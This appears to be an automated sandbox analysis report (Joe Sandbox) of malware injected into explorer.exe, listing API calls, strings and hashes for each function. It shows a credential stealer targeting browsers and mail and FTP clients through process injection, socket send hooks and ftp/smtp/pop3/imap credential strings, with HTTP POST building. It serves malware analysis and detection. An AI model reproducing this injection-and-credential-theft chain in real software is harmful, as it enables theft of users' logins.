API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1680033604
Opcode ID: afed492053cd522b9afe71347bf2c654f520f5f60312b61268479a069dde4066
Instruction ID: 260758889674d7e68a753f1e38de4696e004323b3558082905965e7e9c0e85f6
Opcode Fuzzy Hash: afed492053cd522b9afe71347bf2c654f520f5f60312b61268479a069dde4066
Instruction Fuzzy Hash: 29719739505B05ABD700EF7A9C44EAFBBEC6B65680F08092FF940DE245EB60D5058B68

Function 034A10A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034A10DF
Process32First.KERNEL32(00000000,?), ref: 034A10FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 034A111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 034A112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 034A1142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 034A1156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A1166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 034A117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 034A118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 034A11A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 034A11B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 034A11CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 034A11DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 034A11F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 034A1206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 034A1216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 034A1226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 034A1236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 034A1246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 034A1256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 034A1266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 034A1276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 034A12B4
Process32Next.KERNEL32(00000000,00000128), ref: 034A130B
CloseHandle.KERNELBASE(00000000), ref: 034A131C
Sleep.KERNELBASE(000003E8), ref: 034A1327

Strings

thebat32.exe, xrefs: 034A1198
mailchat.exe, xrefs: 034A126C
smartftp.exe, xrefs: 034A11E8
outlook.exe, xrefs: 034A1170
flashfxp.exe, xrefs: 034A120C
winscp.exe, xrefs: 034A11FC
chrome.exe, xrefs: 034A1138
foxmail.exe, xrefs: 034A124C
alimail.exe, xrefs: 034A125C
firefox.exe, xrefs: 034A1114
microsoftedgecp.exe, xrefs: 034A10D2, 034A1160, 034A12AE
263em.exe, xrefs: 034A123C
iexplore.exe, xrefs: 034A1124
thunderbird.exe, xrefs: 034A11C0
thebat.exe, xrefs: 034A1184
cuteftppro.exe, xrefs: 034A121C
mailmaster.exe, xrefs: 034A122C
filezilla.exe, xrefs: 034A11D4
thebat64.exe, xrefs: 034A11AC
opera.exe, xrefs: 034A114C

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: b9ef6402ce35b9e2c8939ce6cd272994398ec1dff8c4f6963e78550a967d19f1
Instruction ID: 1afe79fa2dc030064edce96f75f34de16107a51cce21a0b29bdaf8ff24634070
Opcode Fuzzy Hash: b9ef6402ce35b9e2c8939ce6cd272994398ec1dff8c4f6963e78550a967d19f1
Instruction Fuzzy Hash: DE51B835605B05AADB00EEB98C45E6FBBEC6F65680F0C092FF940EE245EB60D5058B7D

Function 034A7728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A6000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a6000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47475e8a0d2230fd67fa860eb5ae9145b52022901dc1742ef55cbc3d7c1f2ebe
Instruction ID: a13c607c009881bbf893c21b6abb73aa91912381739ac3051e5407e881449c9c
Opcode Fuzzy Hash: 47475e8a0d2230fd67fa860eb5ae9145b52022901dc1742ef55cbc3d7c1f2ebe
Instruction Fuzzy Hash: AD510975948B514ED731CABCCC806A2BFA4DB52221B1D06BFC5E5CF3C2E6946806C7A8

Function 034A2861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
RtlAllocateHeap.NTDLL(00000000), ref: 034A286B

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6a569aa98bbe44d98379805524a24d7dabb825f7f3654da1bfcfa9c2b66380c8
Instruction ID: c028da2f56c152f8a112d5a437fd2265220500c92d35ffd5d89af8507a74fe27
Opcode Fuzzy Hash: 6a569aa98bbe44d98379805524a24d7dabb825f7f3654da1bfcfa9c2b66380c8
Instruction Fuzzy Hash: 50A012748045007FDD403FA0A80DF073E98A740301F0000407189DC04CA960004C9721

Non-executed Functions

Function 034A1819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034A2608: VirtualQuery.KERNEL32(034A4434,?,0000001C), ref: 034A2615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 034A184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 034A1889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 034A1919
RtlMoveMemory.NTDLL(00000000,034A3428,00000016), ref: 034A1940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 034A1968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 034A1978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 034A1992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 034A199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A19A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A19AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 034A19C5
GetProcAddress.KERNEL32(00000000), ref: 034A19CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A19E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A1A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 034A1A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 034A1A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 034A1A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 034A1A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 034A1A74

Strings

microsoftedgecp.exe, xrefs: 034A181D
ntdll, xrefs: 034A19C0
opera_shared_counter, xrefs: 034A198B
atan, xrefs: 034A19BB

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-4141090125
Opcode ID: f2e91ceb3539260aa7fb399cff5b27f708ecd11fa2bee837980d6a7f51558aa8
Instruction ID: bb6f2995821048956ccac2243c660d269de810221ebe622819e5078d0b861c19
Opcode Fuzzy Hash: f2e91ceb3539260aa7fb399cff5b27f708ecd11fa2bee837980d6a7f51558aa8
Instruction Fuzzy Hash: C361BF75608B04AFD310EF69DC44E6BBFECEF98654F04051AF989EB244E770D9048B65

Function 034A263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 034A265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 034A2672
lstrlen.KERNEL32(?,00000000), ref: 034A267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 034A2685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 034A269F
wsprintfA.USER32 ref: 034A26B6
CryptDestroyHash.ADVAPI32(?), ref: 034A26CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 034A26D9

Strings

%02X, xrefs: 034A26B0

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 0b33fb70e941364a5c11fe9cee9712b07d7112d3f124d0a4d83c666b2a54ec31
Instruction ID: bf9d6f1d7bb9fa84e4aaa8a3a999c0e6753da22d17aeb5f867c5098614e2bc34
Opcode Fuzzy Hash: 0b33fb70e941364a5c11fe9cee9712b07d7112d3f124d0a4d83c666b2a54ec31
Instruction Fuzzy Hash: A211BFB590040CBFEB10AF99EC88EAFBFBCEB48300F104062F641E6108E7704E00AB20

Function 034A1B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 034A1B4E
LoadLibraryA.KERNEL32(?,034A4434,00000000,00000000,74DF2EE0,00000000,034A1910,?,?,?,00000001,?,00000000), ref: 034A1B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 034A1BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 034A1BF4

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 3b395db18818814cc4b3f7321076931e2da4dd690e5eeb6cd2c494ad3e5a5775
Instruction ID: c1dbfac9afb9271a37e85cd5030fed500a5a1c56828c5eddf4d9de1a76490170
Opcode Fuzzy Hash: 3b395db18818814cc4b3f7321076931e2da4dd690e5eeb6cd2c494ad3e5a5775
Instruction Fuzzy Hash: A931A475700A01ABCB24CE2DC985B66B7E8EF25315F08456EE896CF301E731E845CBA8

Function 034A1332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,034A109E,?,034A1010), ref: 034A134A
GetCurrentProcessId.KERNEL32(00000003,?,034A109E,?,034A1010), ref: 034A135B
wsprintfA.USER32 ref: 034A1372

Part of subcall function 034A263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 034A265A
Part of subcall function 034A263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 034A2672
Part of subcall function 034A263E: lstrlen.KERNEL32(?,00000000), ref: 034A267A
Part of subcall function 034A263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 034A2685
Part of subcall function 034A263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 034A269F
Part of subcall function 034A263E: wsprintfA.USER32 ref: 034A26B6
Part of subcall function 034A263E: CryptDestroyHash.ADVAPI32(?), ref: 034A26CF
Part of subcall function 034A263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 034A26D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 034A1389
GetLastError.KERNEL32 ref: 034A138F
Sleep.KERNEL32(000001F4), ref: 034A13A1

Part of subcall function 034A24D5: GetCurrentProcessId.KERNEL32 ref: 034A24E7
Part of subcall function 034A24D5: GetCurrentThreadId.KERNEL32 ref: 034A24EF
Part of subcall function 034A24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 034A24FF
Part of subcall function 034A24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 034A250D
Part of subcall function 034A24D5: CloseHandle.KERNEL32(00000000), ref: 034A2566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 034A13B8
GetProcAddress.KERNEL32(00000000), ref: 034A13BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 034A13E4
GetProcAddress.KERNEL32(00000000), ref: 034A13EB

Part of subcall function 034A1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 034A1E1D

RtlExitUserThread.NTDLL(00000000), ref: 034A141D

Strings

%s%d%d%d, xrefs: 034A136C
send, xrefs: 034A13AE
WSASend, xrefs: 034A13DA
ws2_32.dll, xrefs: 034A13B3, 034A13DF

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 882a04ac5a3e68f29e40d2f7f67f9cf6fa0808b50768b1d01336b0677d40d13e
Instruction ID: b3e42d608187135af638fbb8cf4990537641085099ca1d8640e954e2d8151ba2
Opcode Fuzzy Hash: 882a04ac5a3e68f29e40d2f7f67f9cf6fa0808b50768b1d01336b0677d40d13e
Instruction Fuzzy Hash: 5631F639304F14BFDB00FFAEDC09B9E3E95AF64A01F14441AF506AE385DBB584019798

Function 034A1647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(034A4220,?,?), ref: 034A1679
lstrlen.KERNEL32(?), ref: 034A1686
getpeername.WS2_32(?,?,?), ref: 034A16A0
inet_ntoa.WS2_32(?), ref: 034A16B1
htons.WS2_32(?), ref: 034A16BF
wsprintfA.USER32 ref: 034A1725

Strings

ftp://%s:%s@%s:%d, xrefs: 034A1708
pop3://%s:%s@%s:%d, xrefs: 034A1701
imap://%s:%s@%s:%d, xrefs: 034A16FA
smtp://%s:%s@%s:%d, xrefs: 034A16F3, 034A1723

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 170eb8f635945fac7cc31a7e42e764c62ea29bdcdf8af1151415f0af693f767c
Instruction ID: 4f3867f692fcead8502ea8722c3aefddc753b34ed15395883dfab958e7fc5463
Opcode Fuzzy Hash: 170eb8f635945fac7cc31a7e42e764c62ea29bdcdf8af1151415f0af693f767c
Instruction Fuzzy Hash: 8021A63EA00A096BDB10DEAD8C845BFBAAD9B65202F0C417BE954EF315DB34C9019A58

Function 034A1752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,034A1539,?,?,?,034A144B,?), ref: 034A1763
GetProcAddress.KERNEL32(00000000), ref: 034A176A
RtlZeroMemory.NTDLL(034A4228,00000104), ref: 034A1788
RtlZeroMemory.NTDLL(034A4118,00000104), ref: 034A1790
RtlZeroMemory.NTDLL(034A4330,00000104), ref: 034A1798
RtlZeroMemory.NTDLL(034A4000,00000104), ref: 034A17A1

Strings

%s%s%s%s, xrefs: 034A17B3
ntdll.dll, xrefs: 034A175A
sscanf, xrefs: 034A1755

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: dc48d9b8aad01cc963ceb15cc759135fcb4be79d34df1d32527bb5964a59033d
Instruction ID: 7b97888f2dfa03518ec3255470ca9a9fa3a4702e0216002167803569f1388bfd
Opcode Fuzzy Hash: dc48d9b8aad01cc963ceb15cc759135fcb4be79d34df1d32527bb5964a59033d
Instruction Fuzzy Hash: D1F05437781F283BC110A6AF6C0AC4FBD5CC5B1DE63620157B5246F307A9D5680056AD

Function 034A24D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 034A24E7
GetCurrentThreadId.KERNEL32 ref: 034A24EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 034A24FF
Thread32First.KERNEL32(00000000,0000001C), ref: 034A250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 034A252C
SuspendThread.KERNEL32(00000000), ref: 034A253C
CloseHandle.KERNEL32(00000000), ref: 034A254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 034A255B
CloseHandle.KERNEL32(00000000), ref: 034A2566

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: c220f1425761c7fb938475e75c32a0d900da8ca03c20b7e0883adeb507ee53d6
Instruction ID: e1d2554f80520385405c60c04e91c45d05a973f54fd4ebb4ad401143445ca6aa
Opcode Fuzzy Hash: c220f1425761c7fb938475e75c32a0d900da8ca03c20b7e0883adeb507ee53d6
Instruction Fuzzy Hash: 581182B5408A01EFD700EF64A80DB6FFFE8FF49701F04091AF681AA148E7708505ABA6

Function 034A1F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B

Part of subcall function 034A27E2: lstrlen.KERNEL32(034A40DA,?,00000000,00000000,034A1F86,74DE8A60,034A40DA,00000000), ref: 034A27EA
Part of subcall function 034A27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,034A40DA,00000001,00000000,00000000), ref: 034A27FC

Part of subcall function 034A2374: RtlZeroMemory.NTDLL(?,00000018), ref: 034A2386

RtlZeroMemory.NTDLL(?,0000003C), ref: 034A1FE2
wsprintfW.USER32 ref: 034A211B
wsprintfW.USER32 ref: 034A2186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 034A2250

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 034A21AA
Host: %s, xrefs: 034A2180
Accept: */*Referer: %S, xrefs: 034A2111
POST, xrefs: 034A20CC

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 6f51b6e9cd748f5949bca28e5ff38a27ca2dee43bff7bbd6dc6e5602cbabee81
Instruction ID: 6447cc142220379f00ee88051dce7968fa241ef3d9d537f9218d57b5f4ca138a
Opcode Fuzzy Hash: 6f51b6e9cd748f5949bca28e5ff38a27ca2dee43bff7bbd6dc6e5602cbabee81
Instruction Fuzzy Hash: 3DA1A075608B04AFD310DF69C884A2BBBE8FF98340F14492EF985DB350EBB0D9049B56

Function 034A25AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,034A1287), ref: 034A25BF
IsWow64Process.KERNEL32(000000FF,?), ref: 034A25D1
IsWow64Process.KERNEL32(00000000,?), ref: 034A25E4
CloseHandle.KERNEL32(00000000), ref: 034A25FA

Strings

microsoftedgecp.exe, xrefs: 034A25AD

Memory Dump Source

Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: 4bbed5d979c632a3581d127f441f870195fb4c4ff9ad6a3b019e30319e42dfd1
Instruction ID: 1a83addc241b9f364b06b51c2c2651c00d7f2569fd694a5ca690db872e70ef71
Opcode Fuzzy Hash: 4bbed5d979c632a3581d127f441f870195fb4c4ff9ad6a3b019e30319e42dfd1
Instruction Fuzzy Hash: 21F0B475906A1CFF9B10DF949D888EFBBACFF05251F14426AF901AA284E7714F04F6A4

Analysis Process: explorer.exePID: 5368, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00F6355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00F635D8

Memory Dump Source

Source File: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f61000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 605a085198037e2ce1e4127eb7ccf0d724207d4a84addab63ff3889230126574
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: 7D119430A15A095FEB58BBB898AD67937A0FB54311F58012AA81AC76A1DB3D8A40D701

Function 00F63220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F63266
Process32First.KERNEL32 ref: 00F63289
Process32Next.KERNEL32 ref: 00F63532
CloseHandle.KERNELBASE ref: 00F63543
SleepEx.KERNELBASE ref: 00F6354E

Memory Dump Source

Source File: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f61000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: 5d9eeb141caa5740bd632d719419426fa81fee1fd696639cb4cdb378cffdc67b
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 098131316186098FE71AEF64EC58BEAB7A1FB51741F44472AA443C71A0EF78DA04DB81

Function 00F6A048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00F6A147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F6A1BB
VirtualProtect.KERNELBASE ref: 00F6A1D9

Memory Dump Source

Source File: 00000011.00000002.4175265628.0000000000F67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f67000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: b55971858ab42edf6796f99acebc117824dff2dd9884f84e3eab229f973c003a
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: C851AB3275891D0BCB24AB3C9CC07F5B7C1E756335F18072AC48AD3285E959D886AF83

Analysis Process: explorer.exePID: 3588, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00551016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00552724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,005529F3,-00000001,0055128C), ref: 00552731

Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00551038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0055106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00551075
GetCurrentProcessId.KERNEL32(?,00551010), ref: 0055107B
wsprintfA.USER32 ref: 005510E7
